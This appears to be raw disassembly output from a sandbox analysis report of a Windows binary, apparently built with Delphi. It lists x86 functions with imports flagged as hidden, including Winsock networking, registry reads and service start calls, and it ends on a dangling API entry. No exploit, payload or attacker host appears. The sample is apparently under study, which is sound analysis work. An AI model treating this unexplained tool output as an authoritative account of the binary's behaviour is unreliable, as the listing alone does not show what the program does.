00414FE8 add esp, FFFFFFF0h xrefs 00418634, 004186B6, 00418C06, 00418C68, 0041900B, 004190DD
00414FEB lea eax, dword ptr [esp+08h]
00414FEF push eax
00414FF0 call 00406254h QueryPerformanceFrequency@KERNEL32.DLL (Hidden Import)
00414FF5 test eax, eax
00414FF7 je 00415018h
00414FF9 push esp
00414FFA call 0040624Ch QueryPerformanceCounter@KERNEL32.DLL (Hidden Import)
00414FFF fild qword ptr [esp]
00415002 fild qword ptr [esp+08h]
00415006 fdivp st(1), st(0)
00415008 fmul dword ptr [00415024h]
0041500E call 00402A44h
00415013 and eax, FFFFFFFFh
00415016 jmp 0041501Dh
00415018 call 004061F4h GetTickCount@KERNEL32.DLL (Hidden Import) xrefs 00414FF7
0041501D add esp, 10h xrefs 00415016
00415020 ret function end
APIs
  • recvfrom.WS2_32, ref: 00413B67
Address Instruction Meta Information
00413B4C push ebp xrefs 00419D54
00413B4D mov ebp, esp
00413B4F push ecx
00413B50 push ebx
00413B51 mov dword ptr [ebp-04h], 0000001Ch
00413B58 lea ebx, dword ptr [ebp-04h]
00413B5B push ebx
00413B5C mov ebx, dword ptr [ebp+08h]
00413B5F push ebx
00413B60 mov ebx, dword ptr [ebp+0Ch]
00413B63 push ebx
00413B64 push ecx
00413B65 push edx
00413B66 push eax
00413B67 call dword ptr [0042B408h] recvfrom@WS2_32.DLL (Hidden Import)
00413B6D pop ebx
00413B6E pop ecx
00413B6F pop ebp
00413B70 retn 0008h function end
APIs
  • InitializeCriticalSection.KERNEL32, ref: 00401A1E
  • RtlEnterCriticalSection.NTDLL, ref: 00401A31
  • LocalAlloc.KERNEL32, ref: 00401A5B
  • RtlLeaveCriticalSection.NTDLL, ref: 00401AB8
Address Instruction Meta Information
00401A08 push ebp xrefs 0040229D, 00402108, 00402618
00401A09 mov ebp, esp
00401A0B xor edx, edx
00401A0D push ebp
00401A0E push 00401ABEh
00401A13 push dword ptr fs:[edx]
00401A16 mov dword ptr fs:[edx], esp
00401A19 push 0042C5C4h
00401A1E call 0040135Ch InitializeCriticalSection@KERNEL32.DLL (Hidden Import)
00401A23 cmp byte ptr [0042C045h], 00000000h
00401A2A je 00401A36h
00401A2C push 0042C5C4h
00401A31 call 00401364h RtlEnterCriticalSection@NTDLL.DLL (Hidden Import)
00401A36 mov eax, 0042C5E4h xrefs 00401A2A
00401A3B call 004013CCh
00401A40 mov eax, 0042C5F4h
00401A45 call 004013CCh
00401A4A mov eax, 0042C620h
00401A4F call 004013CCh
00401A54 push 00000FF8h
00401A59 push 00000000h
00401A5B call 0040133Ch LocalAlloc@KERNEL32.DLL (Hidden Import)
00401A60 mov dword ptr [0042C61Ch], eax
00401A65 cmp dword ptr [0042C61Ch], 00000000h
00401A6C je 00401A9Dh
00401A6E mov eax, 00000003h
00401A73 mov edx, dword ptr [0042C61Ch] 00147BC8 xrefs 00401A85
00401A79 xor ecx, ecx
00401A7B mov dword ptr [edx+eax*4-0Ch], ecx
00401A7F inc eax
00401A80 cmp eax, 00000401h
00401A85 jne 00401A73h
00401A87 mov eax, 0042C604h
00401A8C mov dword ptr [eax+04h], eax
00401A8F mov dword ptr [eax], eax
00401A91 mov dword ptr [0042C610h], eax
00401A96 mov byte ptr [0042C5BCh], 00000001h
00401A9D xor eax, eax xrefs 00401A6C
00401A9F pop edx
00401AA1 pop ecx Count = 2
00401AA2 mov dword ptr fs:[eax], edx
00401AA5 push 00401AC5h
00401AAA cmp byte ptr [0042C045h], 00000000h xrefs 00401AC3
00401AB1 je 00401ABDh
00401AB3 push 0042C5C4h
00401AB8 call 0040136Ch RtlLeaveCriticalSection@NTDLL.DLL (Hidden Import)
00401ABD ret xrefs 00401AB1 function end
APIs
  • getaddrinfo.WS2_32, ref: 00413BEF
  • getaddrinfo.WS2_32, ref: 00413C32
  • getaddrinfo.WS2_32, ref: 00413C6B
  • getaddrinfo.WS2_32, ref: 00413C8E
  • FreeAddrInfoW.WS2_32, ref: 00413CCD
  • getprotobynumber.WS2_32, ref: 00413D9C
  • getservbyname.WS2_32, ref: 00413DB6
  • htons.WS2_32, ref: 00413DCB
  • inet_addr.WS2_32, ref: 00413E02
  • gethostbyname.WS2_32, ref: 00413E11
  • WSAGetLastError.WS2_32, ref: 00413E19
Address Instruction Meta Information
00413D24 push ebp xrefs 00418105
00413D25 mov ebp, esp
00413D27 add esp, FFFFFF78h
00413D2D push ebx
00413D2E push esi
00413D2F push edi
00413D30 mov dword ptr [ebp-08h], ecx
00413D33 mov dword ptr [ebp-04h], edx
00413D36 mov ebx, eax
00413D38 mov edi, dword ptr [ebp+10h]
00413D3B mov esi, dword ptr [ebp+14h]
00413D3E mov eax, dword ptr [ebp-04h]
00413D41 call 00404868h
00413D46 mov eax, dword ptr [ebp-08h]
00413D49 call 00404868h
00413D4E xor eax, eax
00413D50 push ebp
00413D51 push 00413F2Bh
00413D56 push dword ptr fs:[eax]
00413D59 mov dword ptr fs:[eax], esp
00413D5C xor eax, eax
00413D5E mov dword ptr [ebp-0Ch], eax
00413D61 mov eax, ebx
00413D63 xor ecx, ecx
00413D65 mov edx, 0000001Ch
00413D6A call 00403030h
00413D6F mov eax, esi
00413D71 call 00413B74h
00413D76 test al, al
00413D78 jne 00413E4Fh
00413D7E mov eax, dword ptr [0042C8A4h] 00960A4C
00413D83 call 00413914h
00413D88 xor edx, edx
00413D8A push ebp
00413D8B push 00413E48h
00413D90 push dword ptr fs:[edx]
00413D93 mov dword ptr fs:[edx], esp
00413D96 mov word ptr [ebx], 0002h
00413D9B push edi
00413D9C call dword ptr [0042B3E0h] getprotobynumber@WS2_32.DLL (Hidden Import)
00413DA2 mov esi, eax
00413DA4 xor eax, eax
00413DA6 test esi, esi
00413DA8 je 00413DBCh
00413DAA mov eax, dword ptr [esi]
00413DAC push eax
00413DAD mov eax, dword ptr [ebp-08h]
00413DB0 call 00404878h
00413DB5 push eax
00413DB6 call dword ptr [0042B3D4h] getservbyname@WS2_32.DLL (Hidden Import)
00413DBC test eax, eax xrefs 00413DA8
00413DBE jne 00413DD7h
00413DC0 xor edx, edx
00413DC2 mov eax, dword ptr [ebp-08h]
00413DC5 call 00407608h
00413DCA push eax
00413DCB call dword ptr [0042B424h] htons@WS2_32.DLL (Hidden Import)
00413DD1 mov word ptr [ebx+02h], ax
00413DD5 jmp 00413DDFh
00413DD7 mov ax, word ptr [eax+08h] xrefs 00413DBE
00413DDB mov word ptr [ebx+02h], ax
00413DDF mov eax, dword ptr [ebp-04h] xrefs 00413DD5
00413DE2 mov edx, 00413F48h
00413DE7 call 004047C4h
00413DEC jne 00413DF7h
00413DEE mov dword ptr [ebx+04h], FFFFFFFFh
00413DF5 jmp 00413E30h
00413DF7 mov eax, dword ptr [ebp-04h] xrefs 00413DEC
00413DFA call 00404878h
00413DFF mov edi, eax
00413E01 push edi
00413E02 call dword ptr [0042B420h] inet_addr@WS2_32.DLL (Hidden Import)
00413E08 mov esi, eax
00413E0A mov dword ptr [ebx+04h], esi
00413E0D inc esi
00413E0E jne 00413E30h
00413E10 push edi
00413E11 call dword ptr [0042B3E4h] gethostbyname@WS2_32.DLL (Hidden Import)
00413E17 mov esi, eax
00413E19 call dword ptr [0042B3D0h] WSAGetLastError@WS2_32.DLL (Hidden Import)
00413E1F mov dword ptr [ebp-0Ch], eax
00413E22 test esi, esi
00413E24 je 00413E30h
00413E26 mov eax, dword ptr [esi+0Ch]
00413E2B mov eax, dword ptr [eax] Count = 2
00413E2D mov dword ptr [ebx+04h], eax
00413E30 xor eax, eax xrefs 00413E0E, 00413E24, 00413DF5
00413E32 pop edx
00413E34 pop ecx Count = 2
00413E35 mov dword ptr fs:[eax], edx
00413E38 push 00413F10h
00413E3D mov eax, dword ptr [0042C8A4h] 00960A4C xrefs 00413E4D
00413E42 call 0041391Ch
00413E47 ret function end
00413E4F lea eax, dword ptr [ebp-30h] xrefs 00413D78
00413E52 xor ecx, ecx
00413E54 mov edx, 00000020h
00413E59 call 00403030h
00413E5E lea eax, dword ptr [ebp-50h]
00413E61 xor ecx, ecx
00413E63 mov edx, 00000020h
00413E68 call 00403030h
00413E6D mov byte ptr [ebp-0Dh], 00000000h
00413E71 test esi, esi
00413E73 jne 00413EA3h
00413E75 cmp byte ptr [ebp+08h], 00000000h
00413E79 je 00413E8Fh
00413E7B mov dword ptr [ebp-2Ch], 00000002h
00413E82 mov dword ptr [ebp-4Ch], 00000017h
00413E89 mov byte ptr [ebp-0Dh], 00000001h
00413E8D jmp 00413EA6h
00413E8F mov dword ptr [ebp-4Ch], 00000002h xrefs 00413E79
00413E96 mov dword ptr [ebp-2Ch], 00000017h
00413E9D mov byte ptr [ebp-0Dh], 00000001h
00413EA1 jmp 00413EA6h
00413EA3 mov dword ptr [ebp-2Ch], esi xrefs 00413E73
00413EA6 mov eax, dword ptr [ebp+0Ch] xrefs 00413EA1, 00413E8D
00413EA9 mov dword ptr [ebp-28h], eax
00413EAC mov eax, edi
00413EAE mov dword ptr [ebp-24h], eax
00413EB1 mov edx, dword ptr [ebp-28h]
00413EB4 mov dword ptr [ebp-48h], edx
00413EB7 mov dword ptr [ebp-44h], eax
00413EBA lea eax, dword ptr [ebp-6Ch]
00413EBD push eax
00413EBE lea ecx, dword ptr [ebp-30h]
00413EC1 mov edx, dword ptr [ebp-08h]
00413EC4 mov eax, dword ptr [ebp-04h]
00413EC7 call 00413B90h
00413ECC mov dword ptr [ebp-0Ch], eax
00413ECF mov edi, ebx
00413ED1 lea esi, dword ptr [ebp-6Ch]
00413ED4 mov ecx, 00000007h
00413ED9 rep movsd
00413EDB test eax, eax
00413EDD je 00413F10h
00413EDF cmp byte ptr [ebp-0Dh], 00000000h
00413EE3 je 00413F10h
00413EE5 lea eax, dword ptr [ebp-00000088h]
00413EEB push eax
00413EEC lea ecx, dword ptr [ebp-50h]
00413EEF mov edx, dword ptr [ebp-08h]
00413EF2 mov eax, dword ptr [ebp-04h]
00413EF5 call 00413B90h
00413EFA mov dword ptr [ebp-0Ch], eax
00413EFD test eax, eax
00413EFF jne 00413F10h
00413F01 mov edi, ebx
00413F03 lea esi, dword ptr [ebp-00000088h]
00413F09 mov ecx, 00000007h
00413F0E rep movsd
00413F10 xor eax, eax xrefs 00413EDD, 00413EE3, 00413EFF
00413F12 pop edx
00413F14 pop ecx Count = 2
00413F15 mov dword ptr fs:[eax], edx
00413F18 push 00413F32h
00413F1D lea eax, dword ptr [ebp-08h] xrefs 00413F30
00413F20 mov edx, 00000002h
00413F25 call 00404400h
00413F2A ret function end
APIs
  • RegOpenKeyExA.ADVAPI32, ref: 004035CA
  • RegQueryValueExA.ADVAPI32, ref: 004035FD
  • RegCloseKey.ADVAPI32, ref: 00403613
Strings
  • FPUMaskValue, va: 0040365C
Address Instruction Meta Information
004035A8 push ebp xrefs 00405EE2
004035A9 mov ebp, esp
004035AB add esp, FFFFFFF4h
004035AE movzx eax, word ptr [0042B024h]
004035B5 mov dword ptr [ebp-08h], eax
004035B8 lea eax, dword ptr [ebp-04h]
004035BB push eax
004035BC push 00000001h
004035BE push 00000000h
004035C0 push 00403640h
004035C5 push 80000002h
004035CA call 004012B0h RegOpenKeyExA@ADVAPI32.DLL (Hidden Import)
004035CF test eax, eax
004035D1 jne 00403620h
004035D3 xor eax, eax
004035D5 push ebp
004035D6 push 00403619h
004035DB push dword ptr fs:[eax]
004035DE mov dword ptr fs:[eax], esp
004035E1 mov dword ptr [ebp-0Ch], 00000004h
004035E8 lea eax, dword ptr [ebp-0Ch]
004035EB push eax
004035EC lea eax, dword ptr [ebp-08h]
004035EF push eax
004035F2 push 00000000h Count = 2
004035F4 push 0040365Ch ASCII "FPUMaskValue"
004035F9 mov eax, dword ptr [ebp-04h]
004035FC push eax
004035FD call 004012B8h RegQueryValueExA@ADVAPI32.DLL (Hidden Import)
00403602 xor eax, eax
00403604 pop edx
00403606 pop ecx Count = 2
00403607 mov dword ptr fs:[eax], edx
0040360A push 00403620h
0040360F mov eax, dword ptr [ebp-04h] xrefs 0040361E
00403612 push eax
00403613 call 004012A8h RegCloseKey@ADVAPI32.DLL (Import)
00403618 ret function end
00403620 mov ax, word ptr [0042B024h] 1332 xrefs 004035D1
00403626 and ax, 0000FFC0h
0040362A mov dx, word ptr [ebp-08h]
0040362E and dx, 003Fh
00403632 or ax, dx
00403635 mov word ptr [0042B024h], ax
0040363B mov esp, ebp
0040363D pop ebp
0040363E ret function end
APIs
  • InterlockedIncrement.KERNEL32, ref: 00412F29
Address Instruction Meta Information
00412F24 push 0042C878h xrefs 004131BB
00412F29 call 0040616Ch InterlockedIncrement@KERNEL32.DLL (Hidden Import)
00412F2E ret function end
Address Instruction Meta Information
00418190 push ebx xrefs 00418117, 00419A29, 00419A41
00418191 push esi
00418192 push edi
00418193 add esp, FFFFFFE4h
00418196 mov esi, edx
00418198 lea edi, dword ptr [esp]
0041819B push ecx
0041819C mov ecx, 00000007h
004181A1 rep movsd
004181A3 pop ecx
004181A4 mov ebx, ecx
004181A6 mov edx, ebx
004181A8 mov eax, esp
004181AA call 00413F58h
004181AF add esp, 1Ch
004181B2 pop edi
004181B3 pop esi
004181B4 pop ebx
004181B5 ret function end
APIs
  • htons.WS2_32, ref: 00414056
  • htons.WS2_32, ref: 00414067
Address Instruction Meta Information
00414038 push esi xrefs 004181CB
00414039 push edi
0041403A add esp, FFFFFFE4h
0041403D mov esi, eax
0041403F lea edi, dword ptr [esp]
00414042 mov ecx, 00000007h
00414047 rep movsd
00414049 cmp word ptr [esp], 0017h
0041404E jne 00414061h
00414050 mov ax, word ptr [esp+02h]
00414055 push eax
00414056 call dword ptr [0042B40Ch] htons@WS2_32.DLL (Hidden Import)
0041405C movzx eax, ax
0041405F jmp 00414070h
00414061 mov ax, word ptr [esp+02h] xrefs 0041404E
00414066 push eax
00414067 call dword ptr [0042B40Ch] htons@WS2_32.DLL (Hidden Import)
0041406D movzx eax, ax
00414070 add esp, 1Ch xrefs 0041405F
00414073 pop edi
00414074 pop esi
00414075 ret function end
APIs
  • TlsSetValue.KERNEL32, ref: 00405FE5
  • TlsGetValue.KERNEL32, ref: 00406022
Address Instruction Meta Information
00405FEC mov cl, byte ptr [0042C65Ch] 00 xrefs 00402813, 004027B8, 00413679, 004027F3, 0040275A, 00402768, 00402776, 00402871, 0040287C, 00403BA8, 00403DEB, 00403BD5, 00403D31, 00403D5D, 00403E34
00405FF2 mov eax, dword ptr [0042B0C4h] 00000000
00405FF7 test cl, cl
00405FF9 jne 00406021h
00405FFB mov edx, dword ptr fs:[0000002Ch]
00406002 mov eax, dword ptr [edx+eax*4]
00406005 ret function end
00406006 call 00405FA8h xrefs 00406029
0040600B mov eax, dword ptr [0042B0C4h] 00000000
00406010 push eax
00406011 call 00405F84h
00406016 test eax, eax
00406018 je 0040601Bh
0040601A ret function end
0040601B mov eax, dword ptr [0042C668h] 00000000 xrefs 00406018
00406020 ret function end
00406021 push eax xrefs 00405FF9
00406022 call 00405F84h TlsGetValue@KERNEL32.DLL (Hidden Import)
00406027 test eax, eax
00406029 je 00406006h
0040602B ret function end
APIs
  • SetFilePointer.KERNEL32, ref: 004078F2
Address Instruction Meta Information
004078D0 push ebp xrefs 004121EA
004078D1 mov ebp, esp
004078D3 add esp, FFFFFFF8h
004078D6 push ebx
004078D7 push esi
004078D8 mov esi, edx
004078DA mov ebx, eax
004078DC mov eax, dword ptr [ebp+08h]
004078DF mov dword ptr [ebp-08h], eax
004078E2 mov eax, dword ptr [ebp+0Ch]
004078E5 mov dword ptr [ebp-04h], eax
004078E8 push esi
004078E9 lea eax, dword ptr [ebp-04h]
004078EC push eax
004078ED mov eax, dword ptr [ebp-08h]
004078F0 push eax
004078F1 push ebx
004078F2 call 00406284h SetFilePointer@KERNEL32.DLL (Hidden Import)
004078F7 mov dword ptr [ebp-08h], eax
004078FA mov eax, dword ptr [ebp-08h]
004078FD mov edx, dword ptr [ebp-04h]
00407900 pop esi
00407901 pop ebx
00407903 pop ecx Count = 2
00407904 pop ebp
00407905 retn 0008h function end
APIs
  • SetEvent.KERNEL32, ref: 00412F1E
Address Instruction Meta Information
00412F18 mov eax, dword ptr [0042C848h] 00000048 xrefs 00413159, 0041340E
00412F1D push eax
00412F1E call 0040627Ch SetEvent@KERNEL32.DLL (Hidden Import)
00412F23 ret function end
APIs
  • gethostname.WS2_32, ref: 00413A9D
Address Instruction Meta Information
00413A60 push ebp xrefs 00419785
00413A61 mov ebp, esp
00413A63 push 00000000h
00413A65 push ebx
00413A66 mov ebx, eax
00413A68 xor eax, eax
00413A6A push ebp
00413A6B push 00413ACAh
00413A70 push dword ptr fs:[eax]
00413A73 mov dword ptr fs:[eax], esp
00413A76 mov eax, ebx
00413A78 call 004043DCh
00413A7D lea eax, dword ptr [ebp-04h]
00413A80 mov edx, 000000FFh
00413A85 call 004049A8h
00413A8A mov eax, dword ptr [ebp-04h]
00413A8D call 00404678h
00413A92 dec eax
00413A93 push eax
00413A94 mov eax, dword ptr [ebp-04h]
00413A97 call 00404878h
00413A9C push eax
00413A9D call dword ptr [0042B3ECh] gethostname@WS2_32.DLL (Hidden Import)
00413AA3 mov eax, dword ptr [ebp-04h]
00413AA6 call 00404878h
00413AAB mov edx, eax
00413AAD mov eax, ebx
00413AAF call 004045D4h
00413AB4 xor eax, eax
00413AB6 pop edx
00413AB8 pop ecx Count = 2
00413AB9 mov dword ptr fs:[eax], edx
00413ABC push 00413AD1h
00413AC1 lea eax, dword ptr [ebp-04h] xrefs 00413ACF
00413AC4 call 004043DCh
00413AC9 ret function end
Address Instruction Meta Information
004130DC push ebp
004130DD mov ebp, esp
004130DF push ecx
004130E0 push ebx
004130E1 push esi
004130E2 push edi
004130E3 mov dword ptr [ebp-04h], eax
004130E6 xor eax, eax
004130E8 push ebp
004130E9 push 00413172h
004130EE push dword ptr fs:[eax]
004130F1 mov dword ptr fs:[eax], esp
004130F4 mov eax, dword ptr [ebp-04h]
004130F7 cmp byte ptr [eax+0Dh], 00000000h
004130FB jne 00413132h
004130FD xor eax, eax
004130FF push ebp
00413100 push 0041311Dh
00413105 push dword ptr fs:[eax]
00413108 mov dword ptr fs:[eax], esp
0041310B mov eax, dword ptr [ebp-04h]
0041310E mov edx, dword ptr [eax]
00413110 call dword ptr [edx+04h]
00413113 xor eax, eax
00413115 pop edx
00413117 pop ecx Count = 2
00413118 mov dword ptr fs:[eax], edx
0041311B jmp 00413132h
00413132 xor eax, eax xrefs 004130FB, 0041311B
00413134 pop edx
00413136 pop ecx Count = 2
00413137 mov dword ptr fs:[eax], edx
0041313A push 00413179h
0041313F mov eax, dword ptr [ebp-04h] xrefs 00413177
00413142 mov bl, byte ptr [eax+0Fh]
00413145 mov eax, dword ptr [ebp-04h]
00413148 mov esi, dword ptr [eax+14h]
0041314B mov eax, dword ptr [ebp-04h]
0041314E mov edx, dword ptr [eax]
00413150 call dword ptr [edx]
00413152 mov eax, dword ptr [ebp-04h]
00413155 mov byte ptr [eax+10h], 00000001h
00413159 call 00412F18h
0041315E test bl, bl
00413160 je 0041316Ah
00413162 mov eax, dword ptr [ebp-04h]
00413165 call 00403708h
0041316A mov eax, esi xrefs 00413160
0041316C call 004043D4h
00413171 ret function end
APIs
  • InterlockedIncrement.KERNEL32, ref: 0040599A
Address Instruction Meta Information
00405990 push ebp
00405991 mov ebp, esp
00405993 mov eax, dword ptr [ebp+08h]
00405996 add eax, 04h
00405999 push eax
0040599A call 004012E8h InterlockedIncrement@KERNEL32.DLL (Hidden Import)
0040599F pop ebp
004059A0 retn 0004h function end
APIs
  • GetModuleHandleA.KERNEL32, ref: 0040BC12
  • GetProcAddress.KERNEL32, ref: 0040BC23
Strings
  • kernel32.dll, va: 0040BC44
  • GetDiskFreeSpaceExA, va: 0040BC54
Address Instruction Meta Information
0040BC0C push ebx xrefs 0040C530
0040BC0D push 0040BC44h ASCII "kernel32.dll"
0040BC12 call 004061CCh GetModuleHandleA@KERNEL32.DLL (Hidden Import)
0040BC17 mov ebx, eax
0040BC19 test ebx, ebx
0040BC1B je 0040BC2Dh
0040BC1D push 0040BC54h ASCII "GetDiskFreeSpaceExA"
0040BC22 push ebx
0040BC23 call 004061D4h GetProcAddress@KERNEL32.DLL (Import)
0040BC28 mov dword ptr [0042B154h], eax
0040BC2D cmp dword ptr [0042B154h], 00000000h xrefs 0040BC1B
0040BC34 jne 0040BC40h
0040BC36 mov eax, 00407A4Ch
0040BC3B mov dword ptr [0042B154h], eax
0040BC40 pop ebx xrefs 0040BC34
0040BC41 ret function end
APIs
  • OpenServiceA.ADVAPI32, ref: 00429B39
  • StartServiceA.ADVAPI32, ref: 00429B4D
  • QueryServiceStatus.ADVAPI32, ref: 00429B5C
Address Instruction Meta Information
00429B14 push ebx xrefs 00429EDD
00429B15 push esi
00429B16 push edi
00429B17 add esp, FFFFFFE0h
00429B1A mov esi, eax
00429B1C mov dword ptr [esp+08h], 00000001h
00429B24 push 00000001h
00429B28 push 00000000h Count = 2
00429B2A call 00421BC4h
00429B2F mov ebx, eax
00429B31 test ebx, ebx
00429B33 jle 00429B9Dh
00429B35 push 00000014h
00429B37 push esi
00429B38 push ebx
00429B39 call 00421B6Ch OpenServiceA@ADVAPI32.DLL (Hidden Import)
00429B3E mov esi, eax
00429B40 test esi, esi
00429B42 jle 00429B97h
00429B44 xor eax, eax
00429B46 mov dword ptr [esp], eax
00429B49 push esp
00429B4A push 00000000h
00429B4C push esi
00429B4D call 00421B74h StartServiceA@ADVAPI32.DLL (Hidden Import)
00429B52 test al, al
00429B54 je 00429B91h
00429B56 lea eax, dword ptr [esp+04h]
00429B5A push eax
00429B5B push esi
00429B5C call 00421BACh QueryServiceStatus@ADVAPI32.DLL (Hidden Import)
00429B61 test al, al
00429B63 je 00429B91h
00429B65 jmp 00429B8Ah
00429B67 mov edi, dword ptr [esp+18h] xrefs 00429B8F
00429B6B mov eax, dword ptr [esp+1Ch]
00429B6F push eax
00429B70 call 00421B84h
00429B75 lea eax, dword ptr [esp+04h]
00429B79 push eax
00429B7A push esi
00429B7B call 00421BACh
00429B80 test al, al
00429B82 je 00429B91h
00429B84 cmp edi, dword ptr [esp+18h]
00429B88 jnle 00429B91h
00429B8A cmp dword ptr [esp+08h], 04h xrefs 00429B65
00429B8F jne 00429B67h
00429B91 push esi xrefs 00429B54, 00429B63, 00429B82, 00429B88
00429B92 call 00421B64h
00429B97 push ebx xrefs 00429B42
00429B98 call 00421B64h
00429B9D cmp dword ptr [esp+08h], 04h xrefs 00429B33
00429BA2 sete al
00429BA5 add esp, 20h
00429BA8 pop edi
00429BA9 pop esi
00429BAA pop ebx
00429BAB ret function end
Address Instruction Meta Information
0041D004 push ebx xrefs 0041D0D9, 0041D0A2
0041D005 push esi
0041D006 push edi
0041D007 push ecx
0041D008 mov byte ptr [esp], dl
0041D00B mov esi, eax
0041D00D xor ebx, ebx
0041D00F mov eax, dword ptr [esi+1Ch]
0041D012 mov edx, dword ptr [eax]
0041D014 call dword ptr [edx+10h]
0041D017 mov ecx, 0041D088h
0041D01C mov edx, dword ptr [esi+0Ch]
0041D01F mov eax, dword ptr [esi+1Ch]
0041D022 call 0041836Ch
0041D027 mov eax, dword ptr [esi+1Ch]
0041D02A cmp dword ptr [eax+000001B8h], 00000000h
0041D031 jne 0041D079h
0041D033 mov ecx, dword ptr [esi+08h]
0041D036 mov edx, dword ptr [esi+04h]
0041D039 mov edi, dword ptr [eax]
0041D03B call dword ptr [edi+18h]
0041D03E mov eax, dword ptr [esi+1Ch]
0041D041 cmp dword ptr [eax+000001B8h], 00000000h
0041D048 jne 0041D079h
0041D04A cmp byte ptr [esp], 00000000h
0041D04E je 0041D061h
0041D050 call 0041C0D8h
0041D055 mov eax, dword ptr [esi+1Ch]
0041D058 cmp dword ptr [eax+000001B8h], 00000000h
0041D05F jne 0041D079h
0041D061 lea eax, dword ptr [esi+24h] xrefs 0041D04E
0041D064 mov edx, dword ptr [esi+04h]
0041D067 call 00404430h
0041D06C lea eax, dword ptr [esi+28h]
0041D06F mov edx, dword ptr [esi+08h]
0041D072 call 00404430h
0041D077 mov bl, 01h
0041D079 mov eax, ebx xrefs 0041D031, 0041D048, 0041D05F
0041D07B pop edx
0041D07C pop edi
0041D07D pop esi
0041D07E pop ebx
0041D07F ret function end
APIs
  • 77124CFD.OLEAUT32, ref: 0040DD6D
Address Instruction Meta Information
0040DBB4 push ebp xrefs 0040DDFD
0040DBB5 mov ebp, esp
0040DBB7 add esp, FFFFFCE0h
0040DBBD push ebx
0040DBBE push esi
0040DBBF push edi
0040DBC0 mov dword ptr [ebp-00000308h], ecx
0040DBC6 mov ebx, edx
0040DBC8 mov dword ptr [ebp-00000304h], eax
0040DBCE test byte ptr [ebx+01h], 00000020h
0040DBD2 jne 0040DBDEh
0040DBD4 mov eax, 80070057h
0040DBD9 call 0040D7F4h
0040DBDE mov ax, word ptr [ebx] xrefs 0040DBD2
0040DBE1 mov edx, eax
0040DBE3 and dx, 0FFFh
0040DBE8 cmp dx, 000Ch
0040DBEC jne 0040DD65h
0040DBF2 test ah, 00000040h
0040DBF5 je 0040DC04h
0040DBF7 mov eax, dword ptr [ebx+08h]
0040DBFA mov eax, dword ptr [eax]
0040DBFC mov dword ptr [ebp-00000314h], eax
0040DC02 jmp 0040DC0Dh
0040DC04 mov eax, dword ptr [ebx+08h] xrefs 0040DBF5
0040DC07 mov dword ptr [ebp-00000314h], eax
0040DC0D mov eax, dword ptr [ebp-00000314h] xrefs 0040DC02
0040DC13 movzx eax, word ptr [eax]
0040DC16 mov dword ptr [ebp-00000310h], eax
0040DC1C mov ebx, dword ptr [ebp-00000310h]
0040DC22 dec ebx
0040DC23 test ebx, ebx
0040DC25 jl 0040DC92h
0040DC27 inc ebx
0040DC28 xor edi, edi
0040DC2A lea esi, dword ptr [ebp-00000300h]
0040DC30 mov eax, esi xrefs 0040DC90
0040DC32 mov dword ptr [ebp-00000320h], eax
0040DC38 mov eax, dword ptr [ebp-00000320h]
0040DC3E add eax, 04h
0040DC41 push eax
0040DC42 lea eax, dword ptr [edi+01h]
0040DC45 push eax
0040DC46 mov eax, dword ptr [ebp-00000314h]
0040DC4C push eax
0040DC4D call 0040CA04h
0040DC52 call 0040D7F4h
0040DC57 lea eax, dword ptr [ebp-0000030Ch]
0040DC5D push eax
0040DC5E lea eax, dword ptr [edi+01h]
0040DC61 push eax
0040DC62 mov eax, dword ptr [ebp-00000314h]
0040DC68 push eax
0040DC69 call 0040CA0Ch
0040DC6E call 0040D7F4h
0040DC73 mov eax, dword ptr [ebp-00000320h]
0040DC79 mov edx, dword ptr [ebp-0000030Ch]
0040DC7F sub edx, dword ptr [eax+04h]
0040DC82 inc edx
0040DC83 mov eax, dword ptr [ebp-00000320h]
0040DC89 mov dword ptr [eax], edx
0040DC8B inc edi
0040DC8C add esi, 08h
0040DC8F dec ebx
0040DC90 jne 0040DC30h
0040DC92 lea eax, dword ptr [ebp-00000300h] xrefs 0040DC25
0040DC98 push eax
0040DC99 mov eax, dword ptr [ebp-00000310h]
0040DC9F push eax
0040DCA0 push 0000000Ch
0040DCA2 call 0040C9FCh
0040DCA7 mov esi, eax
0040DCA9 test esi, esi
0040DCAB jne 0040DCB2h
0040DCAD call 0040D54Ch
0040DCB2 mov eax, dword ptr [ebp-00000304h] xrefs 0040DCAB
0040DCB8 call 0040DB0Ch
0040DCBD mov eax, dword ptr [ebp-00000304h]
0040DCC3 mov word ptr [eax], 200Ch
0040DCC8 mov eax, dword ptr [ebp-00000304h]
0040DCCE mov dword ptr [eax+08h], esi
0040DCD1 mov ebx, dword ptr [ebp-00000310h]
0040DCD7 dec ebx
0040DCD8 test ebx, ebx
0040DCDA jl 0040DCF6h
0040DCDC inc ebx
0040DCDD lea eax, dword ptr [ebp-000002FCh]
0040DCE3 lea edx, dword ptr [ebp-00000100h]
0040DCE9 mov ecx, dword ptr [eax] xrefs 0040DCF4
0040DCEB mov dword ptr [edx], ecx
0040DCED add edx, 04h
0040DCF0 add eax, 08h
0040DCF3 dec ebx
0040DCF4 jne 0040DCE9h
0040DCF6 push ebp xrefs 0040DCDA, 0040DD61
0040DCF7 mov ebx, dword ptr [ebp-00000310h]
0040DCFD dec ebx
0040DCFE mov eax, ebx
0040DD00 call 0040DB28h
0040DD05 pop ecx
0040DD06 test al, al
0040DD08 je 0040DD56h
0040DD0A lea eax, dword ptr [ebp-00000318h]
0040DD10 push eax
0040DD11 lea eax, dword ptr [ebp-00000100h]
0040DD17 push eax
0040DD18 mov eax, dword ptr [ebp-00000314h]
0040DD1E push eax
0040DD1F call 0040CA14h
0040DD24 call 0040D7F4h
0040DD29 lea eax, dword ptr [ebp-0000031Ch]
0040DD2F push eax
0040DD30 lea eax, dword ptr [ebp-00000100h]
0040DD36 push eax
0040DD37 push esi
0040DD38 call 0040CA14h
0040DD3D call 0040D7F4h
0040DD42 mov eax, dword ptr [ebp-00000318h]
0040DD48 mov edx, eax
0040DD4A mov eax, dword ptr [ebp-0000031Ch]
0040DD50 call dword ptr [ebp-00000308h]
0040DD56 push ebp xrefs 0040DD08
0040DD57 mov eax, ebx
0040DD59 call 0040DB58h
0040DD5E pop ecx
0040DD5F test al, al
0040DD61 jne 0040DCF6h
0040DD63 jmp 0040DD77h
0040DD65 push ebx xrefs 0040DBEC
0040DD66 mov eax, dword ptr [ebp-00000304h]
0040DD6C push eax
0040DD6D call 0040C5A8h 77124CFD@OLEAUT32.DLL (Import)
0040DD72 call 0040D7F4h
0040DD77 pop edi xrefs 0040DD63
0040DD78 pop esi
0040DD79 pop ebx
0040DD7A mov esp, ebp
0040DD7C pop ebp
0040DD7D ret function end
APIs
  • getprotobynumber.WS2_32, ref: 00414363
